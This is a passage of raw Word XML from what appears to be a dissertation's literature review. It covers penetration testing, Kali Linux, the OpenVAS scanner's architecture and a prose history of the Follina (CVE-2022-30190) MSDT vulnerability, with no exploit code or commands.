        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc113190699"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="78FAAE5F" w14:textId="7A7A19A9" w:rsidR="00DF42B8" w:rsidRDefault="21523073" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter </w:t>
      </w:r>
      <w:r w:rsidR="551D5B75">
        <w:t>investigates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the relevant literature</w:t>
      </w:r>
      <w:r w:rsidR="7B99FE76">
        <w:t xml:space="preserve"> regarding cyber security, penetration testing,</w:t>
      </w:r>
      <w:r w:rsidR="749A2071">
        <w:t xml:space="preserve"> similar studies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="60B25C9D">
        <w:t>various attack vectors, the tools and techniques used to perform them and</w:t>
      </w:r>
      <w:r w:rsidR="551D5B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="30" w:name="_Int_7KDWIvAv"/>
      <w:r w:rsidR="003D18A1">
        <w:t xml:space="preserve">expected </w:t>
      </w:r>
      <w:r w:rsidR="551D5B75">
        <w:t>outcomes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidR="551D5B75">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D263F" w14:textId="08C47784" w:rsidR="009C314D" w:rsidRDefault="00977081" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc113190700"/>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009C314D">
        <w:t xml:space="preserve">Penetration </w:t>
      </w:r>
      <w:r w:rsidR="00791FD9">
        <w:t>Tests</w:t>
      </w:r>
      <w:r w:rsidR="00E75EC5">
        <w:t xml:space="preserve"> and Vulnerability Scans</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="02988789" w14:textId="2FC8EE8D" w:rsidR="00791FD9" w:rsidRDefault="004B3828" w:rsidP="00791FD9">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00834683">
        <w:t>hreat actors</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00834683">
        <w:t>use many technological tools to find ways of exploiting a company’s systems to gain access. Penetration tests can assist companies find the vulnerabilities and proactively mitigate against attacks by imitating the actions of threat actors and creating real-world scenarios that inform the company how well their defences performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063731D" w14:textId="7E7651C1" w:rsidR="00902B5E" w:rsidRPr="00902B5E" w:rsidRDefault="0059400C" w:rsidP="00791FD9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There is a difference between penetration tests and vulnerability scans insofar as the penetration test simulate the threat actors attempting to exploit the company’s security vulnerabilities whilst the vulnerability scans are automated tests that search the system for security weaknesses </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1719278423"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[13], [14], [17]–[20]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="137FDBB6" w14:textId="38A3A83F" w:rsidR="00FE317D" w:rsidRDefault="009C314D" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc113190701"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE317D">
        <w:t>Oracle VM VirtualBox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4142092A" w14:textId="6F6D1FE3" w:rsidR="00FE317D" w:rsidRPr="00FE317D" w:rsidRDefault="00CE3661" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00CE048D">
        <w:t xml:space="preserve"> open-source, cross-platform virtualization software allows virtual machines, </w:t>
      </w:r>
      <w:r w:rsidR="004B3828">
        <w:t>with different operating systems</w:t>
      </w:r>
      <w:r w:rsidR="00CE048D">
        <w:t xml:space="preserve"> to be created and run at the same time on the same </w:t>
      </w:r>
      <w:r w:rsidR="004B3828">
        <w:t>base c</w:t>
      </w:r>
      <w:r w:rsidR="00CE048D">
        <w:t xml:space="preserve">omputer </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-2098932594"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[21]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CE048D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F58F8" w14:textId="6D98A56F" w:rsidR="00FE317D" w:rsidRDefault="00FE317D" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc113190702"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="009C314D">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009C314D">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07DFBD" w14:textId="6C435933" w:rsidR="00FE317D" w:rsidRDefault="008D3E48" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>BackTrack Linux</w:t>
      </w:r>
      <w:r w:rsidR="00CE3661">
        <w:t xml:space="preserve"> before being rebranded and released in 2013 as </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kali Linux is a Debian-based, open-source Linux distribution funded by Offensive Security. It contains hundreds of tools that are aimed at information security tasks, for example, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>penetration testing, reverse engineering, security research and computer forensics</w:t>
      </w:r>
      <w:r w:rsidR="7725B13A" w:rsidRPr="5CCE0127">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="351704601"/>
          <w:placeholder>
            <w:docPart w:val="B4968CCAFF454D81A20E29BBF44F45F0"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[22], [23]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F261A0D" w14:textId="28B7751B" w:rsidR="00FE317D" w:rsidRDefault="00902B5E" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc113190703"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE317D" w:rsidRPr="00FE317D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>OpenV</w:t>
      </w:r>
      <w:r w:rsidR="008D3E48">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidR="00FE317D" w:rsidRPr="00FE317D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Greenbone Vulnerability Management)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidR="00FE317D" w:rsidRPr="00FE317D">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219F88A" w14:textId="77777777" w:rsidR="006A0931" w:rsidRDefault="005732C6" w:rsidP="009C0E6B">
      <w:r>
        <w:t>The number of CVEs released in 2010 was 4,992. By 2020 this number increased to 17,253</w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve"> as illustrated in figure 6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3624FB" w14:textId="4C197DAF" w:rsidR="006A0931" w:rsidRDefault="006A0931" w:rsidP="00C521D6">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C32939" wp14:editId="21B34769">
            <wp:extent cx="5250600" cy="3429818"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="18415"/>
            <wp:docPr id="26" name="Picture 2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Chart, bar chart&#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51729" cy="3430556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F789FB" w14:textId="7DB62D99" w:rsidR="006A0931" w:rsidRDefault="006A0931" w:rsidP="006A0931">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc111363570"/>
      <w:bookmarkStart w:id="36" w:name="_Toc111363707"/>
      <w:bookmarkStart w:id="37" w:name="_Toc111981731"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: CVEs released between 2010 and 2020</w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1124743531"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[24]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="285B6527" w14:textId="77777777" w:rsidR="006A0931" w:rsidRDefault="006A0931" w:rsidP="009C0E6B"/>
    <w:p w14:paraId="2A247E60" w14:textId="238203F4" w:rsidR="00A85E1D" w:rsidRDefault="00A85E1D" w:rsidP="009C0E6B">
      <w:r>
        <w:t>To reduce the risk/impact of cyberattacks, m</w:t>
      </w:r>
      <w:r w:rsidR="005732C6">
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00C521D6">
        <w:t>companies</w:t>
      </w:r>
      <w:r w:rsidR="005732C6">
        <w:t xml:space="preserve"> are now </w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve">incorporating vulnerability scanners into their cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00B6642E">
        <w:t>practices</w:t>
      </w:r>
      <w:r w:rsidR="009C636C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="009C636C">
        <w:t xml:space="preserve"> detect </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="009C636C">
        <w:t>before they can be exploited</w:t>
      </w:r>
      <w:r w:rsidR="00695EF1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D4D22D" w14:textId="29295134" w:rsidR="00695EF1" w:rsidRDefault="005732C6" w:rsidP="009C0E6B">
      <w:r>
        <w:t>OpenVAS</w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve"> and Nessus started in 1998 as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve">open-source project. By 2005 the Nessus version became a professional commercial solution and </w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve"> continue having an open-source version Nessus was forked and the open-source version was rebranded OpenV</w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t>AS</w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C02024">
        <w:t>Since</w:t>
      </w:r>
      <w:r w:rsidR="006A0931">
        <w:t xml:space="preserve"> 2008 Greenbone</w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B3828">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t>operate</w:t>
      </w:r>
      <w:r w:rsidR="004B3828">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="005375D7">
        <w:t xml:space="preserve"> OpenVAS</w:t>
      </w:r>
      <w:r w:rsidR="00C02024">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9EDA1C" w14:textId="2828807E" w:rsidR="00764136" w:rsidRDefault="00764136" w:rsidP="009C0E6B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>There are three major components to the OpenVAS system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D62B0E" w14:textId="0DB8388F" w:rsidR="008814D5" w:rsidRDefault="008814D5" w:rsidP="009C0E6B">
      <w:r w:rsidRPr="008814D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1775C164" wp14:editId="1B88CC6F">
            <wp:extent cx="5608806" cy="1044030"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="33" name="Picture 3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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5608806" cy="1044030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA13CEE" w14:textId="2AA81973" w:rsidR="008814D5" w:rsidRDefault="008814D5" w:rsidP="008814D5">
      <w:r>
        <w:t xml:space="preserve">OpenVAS uses a Linux OS and the distributions provide/create software installation packages. The Greenbone Vulnerability Manager (gvmd) </w:t>
      </w:r>
      <w:r w:rsidR="00CE3661">
        <w:t>uses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the OpenVAS scanner </w:t>
      </w:r>
      <w:r w:rsidR="00CE3661">
        <w:t>through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an Open Scanner Protocol.</w:t>
      </w:r>
      <w:r w:rsidR="006B12D1">
        <w:t xml:space="preserve"> Users are presented with a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web interface </w:t>
      </w:r>
      <w:r w:rsidR="006B12D1">
        <w:t>rather than a Linux command line. The OpenVAS Scanner executes vulnerability tests against the target system using the daily updated Greenbone Enterprise Feed (comprising vulnerability, and compliance checks, together with scan configurations and report formats).</w:t>
      </w:r>
      <w:r w:rsidR="00224B9D">
        <w:t xml:space="preserve"> The results set out the host, port, vulnerability, CVE(s), severity, impact and mitigation </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="1752467377"/>
          <w:placeholder>
            <w:docPart w:val="E3291508DE1B41CAB244A3ED086BA406"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[18], [24]–[28]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B7C33" w14:textId="1F95513B" w:rsidR="00DE40C9" w:rsidRDefault="00B6642E" w:rsidP="00CA2734">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 7 illustrates OpenVAS </w:t>
      </w:r>
      <w:r w:rsidR="006A770E">
        <w:t xml:space="preserve">architecture for </w:t>
      </w:r>
      <w:r>
        <w:t>scanning target systems</w:t>
      </w:r>
      <w:r w:rsidR="009C636C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5DECF" w14:textId="5AF9B81B" w:rsidR="00DE40C9" w:rsidRDefault="00DE40C9" w:rsidP="00CA2734">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFF28B4" w14:textId="27B3A05B" w:rsidR="00CA2734" w:rsidRDefault="00764136" w:rsidP="00CA2734">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:hanging="426"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc111363571"/>
      <w:bookmarkStart w:id="39" w:name="_Toc111363708"/>
      <w:r w:rsidRPr="00764136">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DAF2E4E" wp14:editId="44F95EAC">
            <wp:extent cx="6598004" cy="3314354"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="19685"/>
            <wp:docPr id="31" name="Picture 3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Diagram&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6638220" cy="3334556"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B8107" w14:textId="690D64B9" w:rsidR="005B60FF" w:rsidRDefault="005B60FF" w:rsidP="005B60FF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc111981732"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E1A94">
        <w:t xml:space="preserve"> OpenVAS architecture [28]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="11EC0948" w14:textId="2559CF7F" w:rsidR="00A109D9" w:rsidRPr="00DD6251" w:rsidRDefault="00B728D7" w:rsidP="00A109D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc113190704"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003F0C44">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A109D9">
        <w:t>Follina - CVE2022-30190</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="272CC987" w14:textId="0D33F6D3" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In 2020 </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1862741607"/>
          <w:placeholder>
            <w:docPart w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[29]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> wrote a thesis setting out how to use msdt for code execution. It stated that the ms-msdt protocol opens Microsoft’s Support Diagnostic Tool and any string is passed to the msdt.exe program. All an attacker needs to find is a wizard which allows execution of random programs. Command line execution can be used for user input and this URL</w:t>
      </w:r>
      <w:r w:rsidR="00132C6E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> when opened with shell.openExternal()</w:t>
      </w:r>
      <w:r w:rsidR="00132C6E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> will start a diagnosis bar and when finished the user is required to click a button for a check against the compatibility settings. When this button is clicked the Process Monitor Tools relaunches but this time from the remote server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EA8C6" w14:textId="0D733833" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:r>
        <w:t xml:space="preserve">In March 2021 Microsoft are informed by researchers that Microsoft Office URIs can be used to execute code using, for example, Microsoft Teams, however Microsoft did not issue a CVE or inform their clients but patched the issue in Microsoft Teams in August 2021, however, they failed to patch the MSDT in Windows or the vector for Microsoft Office. In March 2022 an expose is published highlighting the use of MSDT for code execution, however, by 21 April Microsoft closed the ticket suggesting it was not a security related issue as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00132C6E">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD9243" w14:textId="77777777" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003E1D31">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1D994B" wp14:editId="308EC27D">
            <wp:extent cx="5731510" cy="1516380"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="26670"/>
            <wp:docPr id="23" name="Picture 2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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1516380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241087A" w14:textId="5F9BA172" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc111363572"/>
      <w:bookmarkStart w:id="43" w:name="_Toc111363709"/>
      <w:bookmarkStart w:id="44" w:name="_Toc111981733"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Microsoft Confirms MSDT is not a security issue </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1453092960"/>
          <w:placeholder>
            <w:docPart w:val="C8BD3C6292344480AF5624A7AB3B9BA8"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[30]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="23EF1EFE" w14:textId="77777777" w:rsidR="00A109D9" w:rsidRDefault="00A109D9" w:rsidP="00A109D9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
